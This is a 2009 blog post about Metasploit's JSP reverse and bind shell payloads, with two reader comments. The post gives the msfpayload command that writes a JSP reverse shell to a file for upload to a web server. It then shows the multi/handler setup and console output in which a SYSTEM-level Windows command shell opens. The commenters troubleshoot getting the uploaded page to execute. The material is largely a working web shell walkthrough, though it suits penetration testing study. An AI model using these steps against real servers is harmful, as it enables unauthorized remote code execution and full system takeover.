Thursday, October 22, 2009

Metasploit JSP Shells

Stephen Fewer has pushed up a jsp reverse and jsp bind shell.

I'm not sure of all the ways to use them but the easiest way is to just output the shell to raw and just upload it to a web server or for an example with an exploit check out the adobe robohelp exploit.

yomomma@c0:~/pentest/msf3.3dev$ ./msfpayload java/jsp_shell_reverse_tcp LHOST= R > blah.jsp

From there you can set up your multi handler, browse to your page webpath/blah.jsp and grab your shell.

yomomma@c0:~/pentest/msf3.3dev$ ./msfconsole
=[ msf v3.3-dev [core:3.3 api:1.0]

+ -- --=[ 432 exploits - 261 payloads

+ -- --=[ 21 encoders - 8 nops

=[ 222 aux

msf > use exploit/multi/handler

msf exploit(handler) > set PAYLOAD java/jsp_shell_reverse_tcp

set PAYLOAD java/jsp_shell_reverse_tcp

msf exploit(handler) > set LHOST


msf exploit(handler) > info

Name: Generic Payload Handler

Version: 6558

Platform: Windows, Linux, Solaris, Unix, OSX, BSD, PHP

Privileged: No

License: Metasploit Framework License (BSD)

Provided by:

Available targets:

Id Name

-- ----

0 Wildcard Target

Payload information:

Space: 100000

Avoid: 0 characters


This module is a stub that provides all of the features of the

Metasploit payload system to exploits that have been launched

outside of the framework.

msf exploit(handler) > show options

Module options:

Name Current Setting Required Description

---- --------------- -------- -----------

Payload options (java/jsp_shell_reverse_tcp):

Name Current Setting Required Description

---- --------------- -------- -----------
LHOST yes The local address
LPORT 4444 yes The local port
SHELL cmd.exe yes The system shell to use.

Exploit target:

Id Name
-- ----
0 Wildcard Target

msf exploit(handler) > exploit

[*] Starting the payload handler...

[*] Started reverse handler

[*] Command shell session 1 opened ( ->

Microsoft Windows [Version 5.2.3790]

(C) Copyright 1985-2003 Microsoft Corp.


nt authority\system


[*] Command shell session 1 closed.


Fukad said...

Hi! I just have to say great work on thos blog!. This is the first time i got some problems, getting this to work, i start the payload and the multi handler. Upload the blah.jsp to my webserver. But when i try to connect with my "victim" machine to
"webserver/blah.jsp" i only get the "download window" opened. or in Firefox i get the source code to the .jsp.

What am i doing wrong? should i make a (tag)cript language="javaScript"(tag)(blah.jsp) source code(tag)/script(tag)? or what? Keep up the good work, Peace

CG said...

does the webserver know how to handle .jsp pages?